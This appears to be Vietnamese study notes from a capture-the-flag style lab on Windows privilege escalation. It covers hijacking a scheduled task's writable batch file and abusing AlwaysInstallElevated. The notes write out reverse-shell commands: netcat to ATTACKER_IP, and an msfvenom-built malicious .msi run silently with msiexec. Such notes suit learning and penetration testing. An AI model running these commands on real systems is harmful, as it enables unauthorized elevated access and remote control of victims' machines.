Scheduled Tasks
Truy vấn các scheduled task:
schtasks /queryTruy vấn một scheduled task nào đó:
schtasks /query /tn vulntask /fo list /v
Folder: \
HostName: THM-PC1
TaskName: \vulntask
Task To Run: C:\tasks\schtask.bat
Run As User: taskusr1Nếu chúng ta có thể thay đổi trường Task To Run hoặc thay đổi file thực thi của scheduled task thì có thể thực hiện leo thang đặc quyền. Ý tưởng này tương tự với Linux Privilege Escalation - Cron Jobs.
Kiểm tra quyền trên file:
C:\> icacls c:\tasks\schtask.bat
c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(F)Chữ cái F cho biết người dùng có toàn quyền (Full Access) trên file. Khi đó, ta có thể chỉnh sửa file thực thi tùy ý. Chẳng hạn như tạo một reverse shell:
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP ATTACKER_PORT > C:\tasks\schtask.batNếu không muốn phải chờ task thực thi, ta có thể chạy task thủ công như sau:
schtasks /run /tn vulntaskAlways Install Elevated
Tập tin Windows installer files (.msi) có thể được cấu hình để chạy ở các user có đặc quyền cao hơn user thông thường. Để leo thang đặc quyền thông qua file .msi, ta cần hai registry phải được thiết lập. Hai registry này có thể được truy vấn như sau:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\InstallerTạo file .msi để gửi reverse shell sử dụng Metasploit Venom như sau:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_IP LPORT=LOCAL_PORT -f msi -o malicious.msiTất nhiên là ta cũng cần phải sử dụng Metasploit Multi-Handler để nhận rerverse shell.
Chạy file .msi ở target machine như sau:
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi